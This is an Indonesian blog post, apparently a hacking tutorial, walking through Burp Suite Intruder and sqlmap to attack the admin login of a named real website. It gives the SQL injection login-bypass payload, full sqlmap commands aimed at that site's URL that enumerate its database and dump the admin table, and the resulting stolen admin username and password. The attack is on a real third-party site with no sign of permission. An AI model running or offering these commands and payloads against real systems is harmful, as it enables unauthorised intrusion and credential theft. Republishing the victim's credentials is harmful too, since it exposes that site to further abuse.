January is my special month, especialy today. I'm happy =))
Oke, langsung ke pembahasan. Saya akan membagikan sedikit tambahan tentang kombinasi antara kemanfaatan dua tool yang kadang saya gunakan untuk mendapatkan target saya.
- Burpsuite
- Sqlmap
Disini adalah kebingungan ketika kita mencari letak vulnerable parameter yang dikirimkan ke server karena si victim menggunakan basis data html. Maka step pertama yang saya lakukan adalah mencari tempat login si admin.
Oke, saya anggap kamu sudah mengetahui tempat loginnya.
Setting dulu kedua alat tadi, seperti ini.
Firefox -> Edit -> Preferences -> Advanced -> Network -> Setting -> Pilih Manual Proxy Configuration. Set HTTP PROXY dengan 0.0.0.0 dan PORT 8080
Burpsuite -> Tab Proxy -> Intercept -> Intercept is off
Login, agar burpsuite mencatat http request yang dikirim ke server dari website target
Treng!! username or password is incorrect, hahaha. Tidak apa-apa karena burpsuite sudah mencatat datanya.
Block tulisan seperti diatas, lalu tekan CTRL+ I
Pergi ke Intruder, kamu akan melihat catatan data tadi.
Kemudian Setting tab Position dan Payloads seperti gambar dibawah
Set payload type menjadi Runtime file dan load file bypass sql injection injection kamu.
Jika sudah klik menu Intruder -> Start attack
Respon 200 dan 302 disini hampir sama-sama memberikan hasil yang positif walaupun tidak semua, periksa lagi jika kamu melakukannya pada lain target.
Saya ambil seperti hasil scan diatas, dan mencoba login kembali
Username : ' or 1=1 limit 1 -- -+
Password : ' or 1=1 limit 1 -- -+
Hasil dari login menunjukkan bahwa target mempunyai celah sql injection
Kembali ke http respond, kita copy data yang dikirim ke server tadi
- username=admin&password=admin&Input=Submit
sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql --dbs
Snip.. Snipp..
Saat mencari isi database, tables, columns tidak saya gambarkan disini, karena terlalu panjang
DB : digitav2_easse
Tables : setup
Columns : username,password
sqlmap -u "http://eassenugu.com/rear/proccess_login.php" --data "username=admin&password=admin&Input=Submit" -p username --dbms mysql -D digitav2_easse -T setup -C username,password --dump
username : admin, password : website. Untuk membuktikannya coba login kembali
Yeah, you now admin !!
Thanks : R-N for today =))
0 komentar:
Posting Komentar